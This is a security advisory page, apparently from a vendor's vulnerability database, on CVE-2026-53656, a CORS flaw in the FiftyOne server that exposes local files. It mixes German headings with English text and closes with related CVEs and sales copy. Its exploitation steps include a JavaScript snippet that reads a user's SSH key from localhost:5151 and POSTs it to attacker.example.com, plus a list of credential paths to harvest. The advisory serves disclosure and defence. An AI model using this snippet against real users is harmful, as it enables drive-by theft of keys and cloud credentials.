CVE-2026-53656
Python Schwachstellenanalyse und -minderung

Überblick

CVE-2026-53656 is a permissive CORS misconfiguration vulnerability in the FiftyOne App/API server that enables drive-by data exfiltration from a user's local machine. Both fiftyone/server/app.py and the /media route (fiftyone/server/routes/media.py) unconditionally set Access-Control-Allow-Origin: *, allowing any website to make cross-origin requests to the locally running, unauthenticated FiftyOne server and read the responses. All versions of the fiftyone pip package prior to 1.17.0 are affected. The advisory was published on June 4, 2026, and added to the GitHub Advisory Database on July 15, 2026. It carries a CVSS v3.1 base score of 6.3 (Medium) (GitHub Advisory, Voxel51 Advisory).

Technische Details

The root cause is an origin validation error (CWE-346) combined with a permissive cross-domain policy with untrusted domains (CWE-942): both app.py and media.py hard-coded Access-Control-Allow-Origin: * in their response headers, bypassing the browser's same-origin policy for all cross-origin requestors. The unauthenticated /media endpoint accepts a filepath query parameter and serves arbitrary files from the local filesystem, so a malicious page can issue a fetch to http://localhost:5151/media?filepath=/etc/passwd (or any other path) and read the full response. No authentication, credentials, or prior access to the victim's machine are required — the only precondition is that the victim has a FiftyOne server running locally (default port 5151) and visits an attacker-controlled web page. Browsers implementing Private Network Access (e.g., Chromium 142+) partially mitigate the attack, but Safari and Firefox do not yet enforce these protections (GitHub Advisory, Voxel51 Advisory).

Aufprall

Successful exploitation results in high confidentiality impact with no integrity or availability impact. An attacker who lures a victim to a malicious web page can silently exfiltrate arbitrary local files readable by the FiftyOne server process — including SSH private keys, cloud provider credentials, .env files, and dataset media — to an attacker-controlled endpoint. Because the /media endpoint accepts arbitrary filesystem paths, the scope of data exposure extends beyond FiftyOne datasets to any file accessible to the server process user account. Media stored in cloud buckets served via signed URLs on a separate origin is not affected (GitHub Advisory).

Ausnutzungsschritte

  1. Reconnaissance: Identify potential victims who use FiftyOne locally (e.g., data scientists, ML engineers). The FiftyOne server listens on localhost:5151 by default.
  2. Craft malicious page: Create a web page containing JavaScript that issues a cross-origin fetch to the FiftyOne server, e.g.:
fetch('http://localhost:5151/media?filepath=/home/user/.ssh/id_rsa')
  .then(r => r.text())
  .then(data => fetch('https://attacker.example.com/exfil', {method:'POST', body: data}));
  1. Lure the victim: Deliver the malicious page via phishing email, malicious ad, or compromised website. The victim must have a FiftyOne server running locally and be using a browser without Private Network Access enforcement (e.g., Safari or Firefox).
  2. Automatic execution: When the victim's browser loads the page, the fetch executes silently. Because the FiftyOne server responds with Access-Control-Allow-Origin: *, the browser permits the cross-origin read.
  3. Exfiltrate data: The response body (file contents) is forwarded to the attacker's server. The attacker can iterate over known sensitive paths (/etc/passwd, ~/.aws/credentials, ~/.env, SSH keys, etc.) to maximize data collection (GitHub Advisory, Voxel51 Advisory).

Indikatoren für Kompromittierung

  • Network: Outbound HTTP POST or GET requests from the victim's machine to unknown external endpoints shortly after the FiftyOne server receives unusual /media requests; unexpected cross-origin requests to localhost:5151 visible in browser developer tools or local proxy logs.
  • Logs: FiftyOne server access logs showing repeated GET /media?filepath= requests with sensitive filesystem paths (e.g., /etc/passwd, /.ssh/id_rsa, /.aws/credentials, /.env) from 127.0.0.1 or ::1 with a browser User-Agent string (indicating browser-originated requests rather than direct API calls).
  • File System: No direct file system artifacts are created by exploitation, as the attack is read-only and in-memory within the browser context.
  • Process: No unusual child processes; exploitation occurs entirely within the FiftyOne server's normal request-handling flow (GitHub Advisory).

Risikominderung und Problemumgehungen

Upgrade to FiftyOne 1.17.0 or later, which removes the hard-coded Access-Control-Allow-Origin: * header and defaults to same-origin-only responses (FiftyOne Release). If cross-origin access is legitimately required, configure specific trusted origins via the new FIFTYONE_ALLOWED_ORIGINS environment variable (e.g., export FIFTYONE_ALLOWED_ORIGINS='https://trusted.example.com'); setting it to * restores the vulnerable behavior and emits a warning. For users unable to upgrade immediately: do not run the FiftyOne App server while browsing untrusted websites, keep the server bound to localhost (the default), and prefer browsers with Private Network Access enforcement such as Chromium 142+ (Voxel51 Advisory).

Reaktionen der Community

The advisory was published by Voxel51 maintainer benjaminpkane on June 4, 2026, with credited finders vittorio-prodomo and AAtomical, and remediation contributors mo-getter, kevin-dimichel, and AdonaiVera. No significant external media coverage or notable researcher commentary beyond the official advisory has been identified at this time (GitHub Advisory).

Zusätzliche Ressourcen


QuelleDieser Bericht wurde mithilfe von KI erstellt

Verwandt Python Schwachstellen:

CVE-Kennung

Strenge

Punktzahl

Technologieen

Name der Komponente

CISA KEV-Exploit

Hat fix

Veröffentlichungsdatum

GHSA-r3hx-x5rh-p9vvHIGH8.7
  • Python logoPython
  • django-haystack
NeinJaJul 15, 2026
CVE-2026-54457HIGH7.7
  • Python logoPython
  • tensorzero
NeinJaJul 15, 2026
CVE-2026-50271HIGH7.5
  • Python logoPython
  • ddtrace
NeinJaJul 15, 2026
CVE-2026-54254MEDIUM6.9
  • Python logoPython
  • cyberdrop-dl-patched
NeinJaJul 15, 2026
CVE-2026-53656MEDIUM6.3
  • Python logoPython
  • fiftyone
NeinJaJul 15, 2026

Kostenlose Schwachstellenbewertung

Benchmarking Ihrer Cloud-Sicherheitslage

Bewerten Sie Ihre Cloud-Sicherheitspraktiken in 9 Sicherheitsbereichen, um Ihr Risikoniveau zu bewerten und Lücken in Ihren Abwehrmaßnahmen zu identifizieren.

Bewertung anfordern

Eine personalisierte Demo anfordern

Sind Sie bereit, Wiz in Aktion zu sehen?

"Die beste Benutzererfahrung, die ich je gesehen habe, bietet vollständige Transparenz für Cloud-Workloads."
David EstlickCISO
"„Wiz bietet eine zentrale Oberfläche, um zu sehen, was in unseren Cloud-Umgebungen vor sich geht.“ "
Adam FletcherSicherheitsbeauftragter
"„Wir wissen, dass, wenn Wiz etwas als kritisch identifiziert, es auch wirklich kritisch ist.“"
Greg PoniatowskiLeiter Bedrohungs- und Schwachstellenmanagement